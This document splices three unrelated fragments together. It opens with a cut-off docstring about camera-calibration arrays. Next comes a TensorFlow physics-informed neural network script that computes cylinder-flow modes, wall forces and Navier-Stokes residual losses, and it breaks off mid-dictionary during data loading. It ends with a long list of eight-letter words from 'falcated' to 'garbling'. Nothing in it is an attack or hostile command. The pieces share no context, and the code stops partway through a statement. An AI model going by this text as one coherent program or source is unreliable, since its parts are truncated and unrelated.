computations, we care about where the camera used to be. This is required if
and only if model is None
- frames_rt_toref: a numpy array of shape (Nframes,6). These are rt
transformations from the coordinate system of each calibration object coord
system to the reference coordinate system. This array represents ALL the
observed chessboards in a calibration optimization problem. This is required
if and only if model is None
- Var_ief: a square numpy array with the intrinsics, extrinsics, frame
covariance. It is the caller's responsibility to make sure | |
'''
return nnf.NN_time_uv(x,y,t,w_u,b_u,geom,omega_0)
def fluid_v(x,y):
'''
Compute mode shapes of v
Input : x,y TF tensors of shape [Nint,1]
Return TF tensor of shape [1,Nint,Nmodes] with complex values
'''
return nnf.out_nn_modes_uv(x,y,w_v,b_v,geom)
def fluid_v_t(x,y,t):
'''
Compute v at instant t and position x,y
Input: x,y,t TF tensors of shape [Nint,1]
Return TF tensor of shape [Nint,1] with real values
'''
return nnf.NN_time_uv(x,y,t,w_v,b_v,geom,omega_0)
def fluid_p(x,y):
'''
Compute mode shapes of p
Input : x,y TF tensors of shape [Nint,1]
Return TF tensor of shape [1,Nint,Nmodes] with complex values
'''
return nnf.out_nn_modes_p(x,y,w_p,b_p)
def fluid_p_t(x,y,t):
'''
Compute p at instant t and position x,y
Input: x,y,t TF tensors of shape [Nint,1]
Return TF tensor of shape [Nint,1] with real values
'''
return nnf.NN_time_p(x,y,t,w_p,b_p,omega_0)
# =============================================================================
# Forces on cylinder
# =============================================================================
def force_cylinder_flatten(t):
'''
t : tf.float32 tensor shape [Nt,1]
----
return
fx_tf,fy_tf : tf.float32 tensor of shape [Nt,] containing averaged horizontal force on cylinder at time t
'''
Nt = int(t.shape[0])
Ns = 1000 # Number of points to perform the integration over the border
s_cyl = tf.constant(np.linspace(0.,1.,Ns), dtype = tf.float32, shape = [Ns,1])*tf.transpose(1+0.*t)
# s_cyl = tf.random.uniform([Ns,1], minval=0., maxval = 1., dtype = tf.float32)*tf.transpose(1+0.*t)
# Reshaping Space x Times on a same dimension
s_cyl_r = tf.reshape(s_cyl,[Nt*Ns,1])
x_cyl_r = tf.reshape(xbc5(s_cyl_r),[Nt*Ns,1])
y_cyl_r = tf.reshape(ybc5(s_cyl_r),[Nt*Ns,1])
t_cyl = (1.+0*s_cyl)*tf.transpose(t)
t_cyl_r = tf.reshape(t_cyl,[Nt*Ns,1])
# Computing fluid values along the border
u = fluid_u_t(x_cyl_r,y_cyl_r,t_cyl_r)
v = fluid_v_t(x_cyl_r,y_cyl_r,t_cyl_r)
p = fluid_p_t(x_cyl_r,y_cyl_r,t_cyl_r)
# Computing differentiated quantities
u_x = tf.gradients(u, x_cyl_r)[0]
u_y = tf.gradients(u, y_cyl_r)[0]
u_xx = tf.gradients(u_x, x_cyl_r)[0]
u_yy = tf.gradients(u_y, y_cyl_r)[0]
v_x = tf.gradients(v, x_cyl_r)[0]
v_y = tf.gradients(v, y_cyl_r)[0]
v_xx = tf.gradients(v_x, x_cyl_r)[0]
v_yy = tf.gradients(v_y, y_cyl_r)[0]
# Computing normal and tangent vectors
nx_base = - tf.gradients(y_cyl_r, s_cyl_r)[0]
ny_base = tf.gradients(x_cyl_r, s_cyl_r)[0]
normalisation = tf.sqrt(tf.square(nx_base) + tf.square(ny_base))
nx = nx_base/normalisation
ny = ny_base/normalisation
# Computing local forces elements
fx_tf_local = -p*nx + 2.*(1./Re)*u_x*nx + (1./Re)*(u_y+v_x)*ny
fy_tf_local = -p*ny + 2.*(1./Re)*v_y*ny + (1./Re)*(u_y+v_x)*nx
# Reshape to [Ns,Nt]
fx_tf_local_r2 = tf.reshape(fx_tf_local,[Ns,Nt])
fy_tf_local_r2 = tf.reshape(fy_tf_local,[Ns,Nt])
# Integrating along the border for every time step
fx_tf = -2.*np.pi*r_c*tf.reduce_mean(fx_tf_local_r2,axis=0)
fy_tf = -2.*np.pi*r_c*tf.reduce_mean(fy_tf_local_r2,axis=0)
return fx_tf,fy_tf
# =============================================================================
# Definition of functions for loss
# =============================================================================
def loss_int_mode(x,y):
'''
Parameters
----------
x,y : float 32 tensor [Nint,1]
Returns
-------
Return a tf.float32 tensor of shape [Nint,1] computing squared errors on modal equations
'''
all_u = fluid_u(x,y)
all_v = fluid_v(x,y)
all_p = fluid_p(x,y)
one = tf.transpose(0.*x + 1.)
def customgrad(fgrad,xgrad):
'''
Input frgad,xgrad : tf.complex64 tensor of shape [1,Nint,N+1] and [1,Nint] resp.
Return a tf.complex64 tensor df/dx of shape [1,Nint,N+1]
(tf.gradients does not seem to work with complex values and with f being of order 3... But it is mainly the same thing here)
'''
fgrad_xgrad = [tf.complex(tf.gradients(tf.real(fgrad[:,:,k]), xgrad, grad_ys = one)[0],tf.gradients(tf.imag(fgrad[:,:,k]), xgrad, grad_ys = one)[0]) for k in range(Nmodes)]
return tf.transpose(tf.convert_to_tensor(fgrad_xgrad), perm=[2,1,0])
all_u_x = customgrad(all_u,x)
all_u_y = customgrad(all_u,y)
all_v_x = customgrad(all_v,x)
all_v_y = customgrad(all_v,y)
all_p_x = customgrad(all_p,x)
all_p_y = customgrad(all_p,y)
all_u_xx = customgrad(all_u_x,x)
all_u_yy = customgrad(all_u_y,y)
all_v_xx = customgrad(all_v_x,x)
all_v_yy = customgrad(all_v_y,y)
# x axis momentum equation
f_u = tf.transpose(tf.convert_to_tensor([tf.complex(0.,k*omega_0)*all_u[:,:,k] for k in range(Nmodes)]), perm=[1,2,0])
f_u += all_p_x
f_u += (-1./Re)*(all_u_xx + all_u_yy)
f_u_4a = [tf.reduce_sum(tf.convert_to_tensor([all_u[:,:,l]*all_u_x[:,:,k-l] for l in range(k+1)]), axis = 0) for k in range(Nmodes)]
f_u += tf.transpose(tf.convert_to_tensor(f_u_4a), perm = [1,2,0])
f_u_4b = [tf.reduce_sum(tf.convert_to_tensor([all_v[:,:,l]*all_u_y[:,:,k-l] for l in range(k+1)]), axis = 0) for k in range(Nmodes)]
f_u += tf.transpose(tf.convert_to_tensor(f_u_4b), perm = [1,2,0])
f_u_5a = [tf.reduce_sum(tf.convert_to_tensor([all_u[:,:,l]*tf.conj(all_u_x[:,:,l-k]) for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
f_u_5a[-1] = f_u_5a[-2]*0.
f_u += tf.transpose(tf.convert_to_tensor(f_u_5a), perm=[1,2,0])
f_u_5b = [tf.reduce_sum(tf.convert_to_tensor([tf.conj(all_u[:,:,l-k])*all_u_x[:,:,l] for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
f_u_5b[-1] = f_u_5b[-2]*0.
f_u += tf.transpose(tf.convert_to_tensor(f_u_5b), perm=[1,2,0])
f_u_5c = [tf.reduce_sum(tf.convert_to_tensor([all_v[:,:,l]*tf.conj(all_u_y[:,:,l-k]) for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
f_u_5c[-1] = f_u_5c[-2]*0.
f_u += tf.transpose(tf.convert_to_tensor(f_u_5c), perm=[1,2,0])
f_u_5d = [tf.reduce_sum(tf.convert_to_tensor([tf.conj(all_v[:,:,l-k])*all_u_y[:,:,l] for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
f_u_5d[-1] = f_u_5d[-2]*0.
f_u += tf.transpose(tf.convert_to_tensor(f_u_5d), perm=[1,2,0])
f_u = tf.reduce_sum(nnf.square_norm(f_u), axis=2)
# y axis Momentum equation
f_v = tf.transpose(tf.convert_to_tensor([tf.complex(0.,k*omega_0)*all_v[:,:,k] for k in range(Nmodes)]), perm=[1,2,0])
f_v += all_p_y
f_v += (-1./Re)*(all_v_xx + all_v_yy)
f_v_4a = [tf.reduce_sum(tf.convert_to_tensor([all_u[:,:,l]*all_v_x[:,:,k-l] for l in range(k+1)]), axis = 0) for k in range(Nmodes)]
f_v += tf.transpose(tf.convert_to_tensor(f_v_4a), perm = [1,2,0])
f_v_4b = [tf.reduce_sum(tf.convert_to_tensor([all_v[:,:,l]*all_v_y[:,:,k-l] for l in range(k+1)]), axis = 0) for k in range(Nmodes)]
f_v += tf.transpose(tf.convert_to_tensor(f_v_4b), perm = [1,2,0])
f_v_5a = [tf.reduce_sum(tf.convert_to_tensor([all_u[:,:,l]*tf.conj(all_v_x[:,:,l-k]) for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
f_v_5a[-1] = f_v_5a[-2]*0.
f_v += tf.transpose(tf.convert_to_tensor(f_v_5a), perm=[1,2,0])
f_v_5b = [tf.reduce_sum(tf.convert_to_tensor([tf.conj(all_u[:,:,l-k])*all_v_x[:,:,l] for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
f_v_5b[-1] = f_v_5b[-2]*0. #quand k=N, k+1 > N
f_v += tf.transpose(tf.convert_to_tensor(f_v_5b), perm=[1,2,0])
f_v_5c = [tf.reduce_sum(tf.convert_to_tensor([all_v[:,:,l]*tf.conj(all_v_y[:,:,l-k]) for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
f_v_5c[-1] = f_v_5c[-2]*0.
f_v += tf.transpose(tf.convert_to_tensor(f_v_5c), perm=[1,2,0])
f_v_5d = [tf.reduce_sum(tf.convert_to_tensor([tf.conj(all_v[:,:,l-k])*all_v_y[:,:,l] for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
f_v_5d[-1] = f_v_5d[-2]*0.
f_v += tf.transpose(tf.convert_to_tensor(f_v_5d), perm=[1,2,0])
f_v = tf.reduce_sum(nnf.square_norm(f_v), axis=2)
# Mass conservation equation
div_u = all_u_x + all_v_y
div_u = tf.reduce_sum(nnf.square_norm(div_u), axis=2)
return div_u + f_u + f_v
def loss_int_time(x,y,t):
'''
Parameters
----------
x,y,t : tf.float 32 tensor [Nint,1]
Returns
-------
Return [Nint,1] tensor containing squared error on NS equations
'''
u = fluid_u_t(x,y,t)
v = fluid_v_t(x,y,t)
p = fluid_p_t(x,y,t)
u_t = tf.gradients(u,t)[0]
v_t = tf.gradients(v,t)[0]
u_x = tf.gradients(u, x)[0]
u_y = tf.gradients(u, y)[0]
u_xx = tf.gradients(u_x, x)[0]
u_yy = tf.gradients(u_y, y)[0]
v_x = tf.gradients(v, x)[0]
v_y = tf.gradients(v, y)[0]
v_xx = tf.gradients(v_x, x)[0]
v_yy = tf.gradients(v_y, y)[0]
p_x = tf.gradients(p, x)[0]
p_y = tf.gradients(p, y)[0]
f_u = u_t + (u*u_x + v*u_y) + p_x - (1./Re)*(u_xx + u_yy)
f_v = v_t + (u*v_x + v*v_y) + p_y - (1./Re)*(v_xx + v_yy)
div_u = u_x + v_y
return tf.square(f_u)+tf.square(f_v)+tf.square(div_u)
def loss_mes(xmes,ymes,tmes,umes,vmes,pmes):
'''
xmes,ymes,tmes,umes,vmes,pmes : [Nmes,1] tf.float32 tensor
Return [Nmes,1] tf.float32 tensor containing square difference to measurements
'''
u_DNN = fluid_u_t(xmes,ymes,tmes)
v_DNN = fluid_v_t(xmes,ymes,tmes)
p_DNN = fluid_p_t(xmes,ymes,tmes)
return tf.square(u_DNN-umes) + tf.square(v_DNN-vmes) + tf.square(p_DNN-pmes)
def loss_mes_uv(xmes,ymes,tmes,umes,vmes):
'''
xmes,ymes,tmes,umes,vmes : [Nmes,1] tf.float32 tensor
Return [Nmes,1] tf.float32 tensor containing square difference to measurements of velocity
'''
u_DNN = fluid_u_t(xmes,ymes,tmes)
v_DNN = fluid_v_t(xmes,ymes,tmes)
return tf.square(u_DNN-umes) + tf.square(v_DNN-vmes)
def loss_mes_p(xmes,ymes,tmes,pmes):
'''
xmes,ymes,tmes,pmes : [Nmes,1] tf.float32 tensor
Return [Nmes,1] tf.float32 tensor containing square difference to measurements of pressure
'''
p_DNN = fluid_p_t(xmes,ymes,tmes)
return tf.square(p_DNN-pmes)
def loss_BC(s):
'''
Return error on u=v=0 on cylinder border for each mode
Input s : [Nbc,1] tf.float32 tensor of coordinates \in [0,1]
Output : [] tf.float32 real positive number
'''
x = xbc5(s)
y = ybc5(s)
u_k = fluid_u(x,y)
v_k = fluid_v(x,y)
err = tf.convert_to_tensor([nnf.square_norm(u_k[0,:,k]) + nnf.square_norm(v_k[0,:,k]) for k in range(Nmodes)])
return tf.reduce_sum(tf.reduce_mean(err,axis=1))
# =============================================================================
# Training loss creation
# =============================================================================
# Wrap error on modal equations
Loss_int_mode_wrap = tf.reduce_mean(loss_int_mode(x_tf_int, y_tf_int))
# Wrap error on physical equations
Loss_int_time_wrap = tf.reduce_mean(loss_int_time(x_tf_int, y_tf_int ,t_tf_int))
# Wrap error on (u,v,p) measurements
Loss_dense_mes = tf.reduce_mean(loss_mes(x_tf_mes,y_tf_mes,t_tf_mes,u_tf_mes,v_tf_mes,p_tf_mes))
# Wrap error on (u,v) measurements at simulated pitot probes locations
Loss_mes_pitot = tf.reduce_mean(loss_mes_uv(x_tf_mes_pitot,y_tf_mes_pitot,t_tf_mes_pitot_resync,u_tf_mes_pitot,v_tf_mes_pitot))
Loss_mes_pitot_desync = tf.reduce_mean(loss_mes_uv(x_tf_mes_pitot,y_tf_mes_pitot,t_tf_mes_pitot,u_tf_mes_pitot,v_tf_mes_pitot))
# Wrap error on pressure measurement around cylindre border
Loss_mes_cyl = tf.reduce_mean(loss_mes_p(x_tf_mes_cyl,y_tf_mes_cyl,t_tf_mes_cyl,p_tf_mes_cyl))
# Simulated experimental losses
Loss_mes_exp = Loss_mes_pitot + Loss_mes_cyl
if args.SparseData:
Loss_mes = Loss_mes_exp
else: # Dense measurements are used for training
Loss_mes = Loss_dense_mes
if args.LossModes:
Loss = Loss_int_mode_wrap + Loss_mes
else: #Physical equations are used instead of modal equations
Loss = Loss_int_time_wrap + Loss_mes
# =============================================================================
# Optimizer configuration
# =============================================================================
opt_LBFGS = nnf.declare_LBFGS(Loss)
opt_Adam = nnf.declare_Adam(Loss, lr=1e-5)
sess = nnf.declare_init_session()
# =============================================================================
# GPU use before loading data
# =============================================================================
print('GPU use before loading data')
GPUtil.showUtilization()
# =============================================================================
# Data set preparation
# =============================================================================
if args.SparseData:
# Let's load data only at locations defined for simulated measurements
print('Loading Sparse Data')
x_int,y_int,t_int,s_train,xmes_pitot,ymes_pitot,tmes_pitot,umes_pitot,vmes_pitot,pmes_pitot,xmes_cyl,ymes_cyl,tmes_cyl,umes_cyl,vmes_cyl,pmes_cyl,Delta_phi_np_pitot_applied = ltd.training_dict(Nmes,Nint,Nbc,filename_data,geom,Tintmax=1e2,data_selection = 'cylinder_pitot',desync=args.DesyncSparseData, multigrid=multigrid,Ngrid=Ngrid,stdNoise=stdNoise,method_int = IntSampling)
Ncyl = len(xmes_cyl)
Npitot = len(xmes_pitot)
Tmin = 400.
if multigrid:
tf_dict = []
for k in range(Ngrid):
tf_dict_temp = {x_tf_int : np.reshape(x_int[k],(Nint,1)),
y_tf_int : np.reshape(y_int[k],(Nint,1)),
t_tf_int : np.reshape(t_int[k],(Nint,1)),
s_tf : np.reshape(s_train,(Nbc,1)),
x_tf_mes_cyl : np.reshape(xmes_cyl,(Ncyl,1)),
y_tf_mes_cyl : np.reshape(ymes_cyl,(Ncyl,1)),
p_tf_mes_cyl : np.reshape(pmes_cyl,(Ncyl,1)),
t_tf_mes_cyl : np.reshape(tmes_cyl,(Ncyl,1)),
x_tf_mes_pitot : np.reshape(xmes_pitot,(Npitot,1)),
y_tf_mes_pitot : np.reshape(ymes_pitot,(Npitot,1)),
u_tf_mes_pitot : np.reshape(umes_pitot,(Npitot,1)),
v_tf_mes_pitot : np.reshape(vmes_pitot,(Npitot,1)),
p_tf_mes_pitot : np.reshape(pmes_pitot,(Npitot,1)),
t_tf_mes_pitot : np.reshape(tmes_pitot,(Npitot,1)),
| |
"falcated",
"falchion",
"falconet",
"falderal",
"falderol",
"fallaway",
"fallfish",
"fallibly",
"falloffs",
"fallouts",
"fallowed",
"faltboat",
"falterer",
"fameless",
"familism",
"famished",
"famishes",
"fanciest",
"fancying",
"fanegada",
"fanfares",
"fanfaron",
"fanfolds",
"fangless",
"fanglike",
"fanlight",
"fantails",
"fantasms",
"fantasts",
"fanworts",
"faradaic",
"faradays",
"faradise",
"faradism",
"faradize",
"farceurs",
"farfalle",
"farinhas",
"farinose",
"farmable",
"farmhand",
"farmings",
"farmwife",
"farmwork",
"farnesol",
"farolito",
"farouche",
"farriers",
"farriery",
"farrowed",
"farsides",
"fartleks",
"fasciate",
"fascicle",
"fascines",
"fascisms",
"fascitis",
"fashious",
"fastings",
"fastness",
"fastuous",
"fatalist",
"fatbacks",
"fatbirds",
"fatheads",
"fatherly",
"fathomed",
"fathomer",
"fatlings",
"fatstock",
"fattened",
"fattener",
"fattiest",
"fatwoods",
"faultier",
"faultily",
"faunally",
"faunlike",
"fauteuil",
"fauvisms",
"fauvists",
"favellas",
"favonian",
"favorers",
"favourer",
"fawniest",
"fawnlike",
"fayalite",
"fazendas",
"fealties",
"feasance",
"feasibly",
"feasters",
"feastful",
"featlier",
"febrific",
"feckless",
"feculent",
"fedayeen",
"federacy",
"federals",
"federate",
"fedexing",
"feeblest",
"feeblish",
"feedable",
"feedbags",
"feedhole",
"feedyard",
"feetless",
"feigners",
"feigning",
"feinting",
"feistier",
"feistily",
"felafels",
"feldsher",
"felinely",
"felinity",
"fellable",
"fellahin",
"fellated",
"fellates",
"fellator",
"fellness",
"fellowed",
"fellowly",
"felsites",
"felsitic",
"felspars",
"felstone",
"feltings",
"feltlike",
"feluccas",
"felworts",
"feminacy",
"feminazi",
"feminise",
"feminity",
"feminize",
"fenagled",
"fenagles",
"fencerow",
"fencible",
"fencings",
"fendered",
"fenestra",
"fenlands",
"fenniest",
"fenthion",
"fenurons",
"feoffees",
"feoffers",
"feoffing",
"feoffors",
"feracity",
"feretory",
"ferities",
"fermatas",
"ferments",
"fermiums",
"ferniest",
"ferninst",
"fernless",
"fernlike",
"ferrates",
"ferreled",
"ferreous",
"ferreted",
"ferreter",
"ferriage",
"ferrites",
"ferritic",
"ferruled",
"ferrying",
"ferryman",
"ferrymen",
"feruling",
"fervency",
"fervidly",
"fervours",
"fesswise",
"festally",
"festered",
"festoons",
"fetation",
"fetchers",
"feterita",
"fetiales",
"fetialis",
"fetiches",
"feticide",
"fetidity",
"fetlocks",
"fetology",
"fettered",
"fetterer",
"fettling",
"feudally",
"feudists",
"fevering",
"feverous",
"fewtrils",
"fiancees",
"fiascoes",
"fiberize",
"fibranne",
"fibrilla",
"fibroins",
"fibromas",
"fibroses",
"fibrotic",
"fibsters",
"ficklest",
"fideisms",
"fideists",
"fidgeted",
"fidgeter",
"fiefdoms",
"fielders",
"fieriest",
"fifteens",
"fiftyish",
"figeater",
"figments",
"figuline",
"figurant",
"figurate",
"figurers",
"figworts",
"filagree",
"filarees",
"filariae",
"filarial",
"filarian",
"filariid",
"filature",
"filberts",
"filchers",
"filching",
"fileable",
"filefish",
"fileting",
"filially",
"filiated",
"filiates",
"filibegs",
"filicide",
"filiform",
"filister",
"filleted",
"filliped",
"filmable",
"filmcard",
"filmdoms",
"filmgoer",
"filmiest",
"filmland",
"filmless",
"filmlike",
"filmsets",
"filterer",
"filthier",
"filthily",
"fimbriae",
"fimbrial",
"finagled",
"finagler",
"finagles",
"finalism",
"finbacks",
"findable",
"fineable",
"fineries",
"finespun",
"finessed",
"finesses",
"finfoots",
"fingerer",
"finialed",
"finickin",
"finiking",
"finitude",
"finmarks",
"finnicky",
"finniest",
"finnmark",
"finochio",
"fireable",
"fireback",
"firebase",
"fireboat",
"firebomb",
"firebrat",
"firebugs",
"fireclay",
"firedamp",
"firedogs",
"firefang",
"firehall",
"fireless",
"firelock",
"firepans",
"firepink",
"fireplug",
"firepots",
"fireroom",
"fireship",
"firetrap",
"fireweed",
"fireworm",
"firriest",
"fishable",
"fishbolt",
"fisheyes",
"fishgigs",
"fishhook",
"fishiest",
"fishings",
"fishless",
"fishlike",
"fishline",
"fishmeal",
"fishpole",
"fishtail",
"fishways",
"fishwife",
"fishworm",
"fissions",
"fissiped",
"fissural",
"fissured",
"fistfuls",
"fistnote",
"fistulae",
"fistular",
"fistulas",
"fitchets",
"fitchews",
"fitfully",
"fitments",
"fittable",
"fivefold",
"fivepins",
"fixatifs",
"fixating",
"fixities",
"fizziest",
"fizzling",
"flabbier",
"flabbily",
"flabella",
"flackery",
"flacking",
"flaggers",
"flaggier",
"flagless",
"flakiest",
"flambeed",
"flameout",
"flamiest",
"flamines",
"flamming",
"flancard",
"flanerie",
"flaneurs",
"flangers",
"flanging",
"flankers",
"flannels",
"flaperon",
"flapjack",
"flapless",
"flappers",
"flappier",
"flareups",
"flashgun",
"flashier",
"flashily",
"flaskets",
"flatbeds",
"flatboat",
"flatcaps",
"flatcars",
"flatfeet",
"flatfish",
"flatfoot",
"flatlets",
"flatling",
"flatlong",
"flattens",
"flatters",
"flattest",
"flatting",
"flattish",
"flattops",
"flatuses",
"flatwash",
"flatways",
"flatwise",
"flatwork",
"flatworm",
"flaunted",
"flaunter",
"flautist",
"flavanol",
"flavines",
"flavones",
"flavonol",
"flavorer",
"flavoury",
"flawiest",
"flaxiest",
"fleabags",
"fleabane",
"fleabite",
"fleapits",
"fleawort",
"flecking",
"flection",
"fledgier",
"fledging",
"fleecers",
"fleeched",
"fleeches",
"fleecier",
"fleecily",
"fleecing",
"fleering",
"fleetest",
"flehmens",
"fleishig",
"flenched",
"flenches",
"flensers",
"flensing",
"fleshers",
"fleshier",
"fleshily",
"fleshing",
"fleshpot",
"fletched",
"fletches",
"fleurons",
"flexagon",
"flexions",
"flextime",
"flexuose",
"flexuous",
"flexures",
"flichter",
"flickery",
"flighted",
"flimflam",
"flimsier",
"flimsies",
"flimsily",
"flinched",
"flincher",
"flinches",
"flingers",
"flinkite",
"flintier",
"flintily",
"flinting",
"flipflop",
"flippest",
"flirters",
"flirtier",
"flitched",
"flitches",
"flitters",
"flitting",
"flivvers",
"floatage",
"floatels",
"floatier",
"floccing",
"floccose",
"floccule",
"flocculi",
"flockier",
"floggers",
"flokatis",
"flooders",
"floorage",
"floorers",
"floosies",
"floozies",
"flopover",
"floppers",
"floppier",
"floppily",
"florally",
"floridly",
"florigen",
"floruits",
"flossers",
"flossier",
"flossies",
"flossily",
"flotages",
"flotsams",
"flounced",
"flounces",
"flouring",
"flouters",
"flouting",
"flowages",
"flowerer",
"floweret",
"flubbers",
"flubbing",
"flubdubs",
"fluerics",
"fluffers",
"fluffier",
"fluffily",
"fluffing",
"fluidics",
"fluidise",
"fluidize",
"fluidram",
"flukiest",
"flummery",
"flumping",
"flunkers",
"flunkeys",
"flunkies",
"flunking",
"fluorene",
"fluorids",
"fluorins",
"flurried",
"flushers",
"flushest",
"flusters",
"flutiest",
"flutings",
"flutists",
"flutters",
"fluttery",
"fluxgate",
"fluxions",
"flyaways",
"flybelts",
"flyblown",
"flyblows",
"flyboats",
"flyovers",
"flypaper",
"flypasts",
"flysches",
"flysheet",
"flyspeck",
"flytiers",
"flytings",
"flytraps",
"foamable",
"foamiest",
"foamless",
"foamlike",
"focalise",
"focalize",
"focusers",
"foddered",
"foetuses",
"fogbound",
"fogeyish",
"fogeyism",
"fogfruit",
"foggages",
"foggiest",
"foghorns",
"fogyisms",
"foilable",
"foilsman",
"foilsmen",
"foisting",
"folacins",
"foldaway",
"foldboat",
"folderol",
"foldouts",
"foliaged",
"foliages",
"foliated",
"foliates",
"folioing",
"folkiest",
"folklike",
"folkmoot",
"folkmote",
"folkmots",
"folksier",
"folksily",
"folksong",
"fomented",
"fomenter",
"fondants",
"fondlers",
"fonduing",
"fontanel",
"fontinas",
"foodless",
"foodways",
"foofaraw",
"foolfish",
"foolscap",
"footages",
"footbags",
"footbath",
"footboys",
"footfall",
"footgear",
"footiest",
"footlers",
"footless",
"footlike",
"footling",
"footmark",
"footpace",
"footpads",
"footrace",
"footrope",
"footsies",
"footslog",
"footsore",
"footstep",
"footwall",
"footways",
"footworn",
"foozlers",
"foozling",
"foragers",
"foramens",
"foramina",
"forayers",
"foraying",
"forbears",
"forbidal",
"forboded",
"forbodes",
"forborne",
"forcedly",
"forcipes",
"fordable",
"fordless",
"fordoing",
"forebays",
"forebear",
"forebode",
"forebody",
"foreboom",
"foredate",
"foredeck",
"foredoes",
"foredone",
"foredoom",
"foreface",
"forefeel",
"forefeet",
"forefelt",
"forefend",
"foregoer",
"foregoes",
"foreguts",
"forehoof",
"foreknew",
"foreknow",
"forelady",
"foreland",
"forelegs",
"forelimb",
"forelock",
"foremast",
"foremilk",
"forenoon",
"forepart",
"forepast",
"forepaws",
"forepeak",
"forerank",
"foreruns",
"foresaid",
"foresail",
"foreseer",
"foreshow",
"foreside",
"forestal",
"forestay",
"foretime",
"foretops",
"forevers",
"forewarn",
"forewent",
"forewing",
"foreworn",
"foreyard",
"forfends",
"forgiver",
"forgoers",
"forgoing",
"forjudge",
"forkball",
"forkedly",
"forkfuls",
"forkiest",
"forkless",
"forklike",
"forksful",
"formable",
"formably",
"formants",
"formates",
"formicas",
"fornical",
"fornices",
"forrader",
"forsaker",
"forsakes",
"forspent",
"forswear",
"forswore",
"forsworn",
"fortuity",
"fortuned",
"fortyish",
"forzandi",
"forzando",
"fossette",
"fossicks",
"fosterer",
"fouettes",
"foughten",
"foulards",
"foulings",
"foulness",
"fourchee",
"foureyed",
"fourgons",
"fourplex",
"foveated",
"foveolae",
"foveolar",
"foveolas",
"foveoles",
"foveolet",
"fowlings",
"foxfires",
"foxhunts",
"foxiness",
"foxskins",
"foxtails",
"foxtrots",
"foziness",
"frabjous",
"fracases",
"fracturs",
"fraenums",
"fragging",
"frailest",
"frakturs",
"framable",
"framings",
"francium",
"francize",
"frankers",
"frankest",
"frapping",
"fraughts",
"fraulein",
"frayings",
"frazzles",
"freakier",
"freakily",
"freakout",
"freebase",
"freebees",
"freeboot",
"freeload",
"freeness",
"freesias",
"freights",
"fremitus",
"frenched",
"frenches",
"frenular",
"frenulum",
"frenzies",
"frenzily",
"frescoed",
"frescoer",
"freshens",
"freshets",
"freshing",
"fresnels",
"fretsaws",
"fretsome",
"fretters",
"frettier",
"fretwork",
"friaries",
"fribbled",
"fribbler",
"fribbles",
"fricando",
"friended",
"frigging",
"frighted",
"frigidly",
"frijoles",
"frillers",
"frillier",
"frilling",
"fringier",
"frippery",
"frisette",
"friseurs",
"friskers",
"friskets",
"friskier",
"friskily",
"frisking",
"frissons",
"frittata",
"fritting",
"frivoled",
"frivoler",
"frizette",
"frizzers",
"frizzier",
"frizzies",
"frizzily",
"frizzing",
"frizzled",
"frizzler",
"frizzles",
"frocking",
"frogeyed",
"frogeyes",
"frogfish",
"froggier",
"frogging",
"froglets",
"froglike",
"frolicky",
"fromages",
"fromenty",
"frondeur",
"frondose",
"frontals",
"frontlet",
"frontmen",
"frontons",
"frostbit",
"frosteds",
"frostier",
"frostily",
"frostnip",
"frothers",
"frothier",
"frothily",
"frottage",
"frotteur",
"froufrou",
"frounced",
"frounces",
"frouzier",
"frowners",
"frowsier",
"frowsted",
"frowzier",
"frowzily",
"frozenly",
"fructify",
"frugally",
"frugging",
"fruitage",
"fruiters",
"fruitier",
"fruitily",
"fruitlet",
"frumenty",
"frumpier",
"frumpily",
"frumpish",
"frustule",
"frustums",
"frybread",
"fubsiest",
"fuchsias",
"fuchsine",
"fuchsins",
"fuckoffs",
"fucoidal",
"fuddling",
"fuehrers",
"fuellers",
"fugacity",
"fuggiest",
"fugleman",
"fuglemen",
"fuguists",
"fulcrums",
"fullered",
"fullface",
"fulmined",
"fulmines",
"fulminic",
"fumarase",
"fumarole",
"fumatory",
"fumblers",
"fumeless",
"fumelike",
"fumettes",
"fumigant",
"fumigate",
"fumingly",
"fumitory",
"funereal",
"funfairs",
"funfests",
"fungible",
"fungoids",
"funguses",
"funicles",
"funiculi",
"funkiest",
"funnyman",
"funnymen",
"furanose",
"furbelow",
"furcated",
"furcates",
"furcraea",
"furculae",
"furcular",
"furculum",
"furfural",
"furfuran",
"furfures",
"furibund",
"furlable",
"furmenty",
"furnaced",
"furriers",
"furriery",
"furriest",
"furriner",
"furrings",
"furrower",
"furuncle",
"furziest",
"fuseless",
"fuselike",
"fusiform",
"fusileer",
"fusilier",
"fusillis",
"fusional",
"fussiest",
"fusspots",
"fustians",
"fustiest",
"futharcs",
"futharks",
"futhorcs",
"futhorks",
"futilely",
"futtocks",
"fuzziest",
"fuzztone",
"gabbards",
"gabbarts",
"gabbiest",
"gabblers",
"gabbling",
"gabbroic",
"gabbroid",
"gabelled",
"gabelles",
"gabfests",
"gadabout",
"gadarene",
"gadflies",
"gadroons",
"gadwalls",
"gadzooks",
"gaggling",
"gagsters",
"gahnites",
"gaieties",
"gainable",
"gainless",
"gainlier",
"gainsaid",
"gainsays",
"galabias",
"galabieh",
"galabiya",
"galangal",
"galangas",
"galateas",
"galavant",
"galbanum",
"galeated",
"galenite",
"galettes",
"galilees",
"galipots",
"galivant",
"gallants",
"gallates",
"galleass",
"galleins",
"galleons",
"galletas",
"galleted",
"galliard",
"galliass",
"gallican",
"gallicas",
"galliots",
"gallipot",
"galliums",
"gallnuts",
"galloons",
"galloots",
"galloped",
"galloper",
"gallused",
"galluses",
"gallying",
"galopade",
"galoping",
"galoshed",
"galoshes",
"galumphs",
"gamashes",
"gambades",
"gambados",
"gambeson",
"gambiers",
"gamboges",
"gamboled",
"gambrels",
"gambusia",
"gamelans",
"gamelike",
"gameness",
"gamesman",
"gamesmen",
"gamesome",
"gamester",
"gaminess",
"gammadia",
"gammiest",
"gammoned",
"gammoner",
"gamodeme",
"ganaches",
"gandered",
"ganglial",
"gangliar",
"ganglier",
"gangling",
"gangplow",
"gangrels",
"gangstas",
"gangways",
"ganister",
"gantlets",
"gantline",
"gantlope",
"gantries",
"gapeseed",
"gapeworm",
"gapingly",
"gappiest",
"garaging",
"garbages",
"garbagey",
"garbanzo",
"garblers",
"garbless",
"garbling",
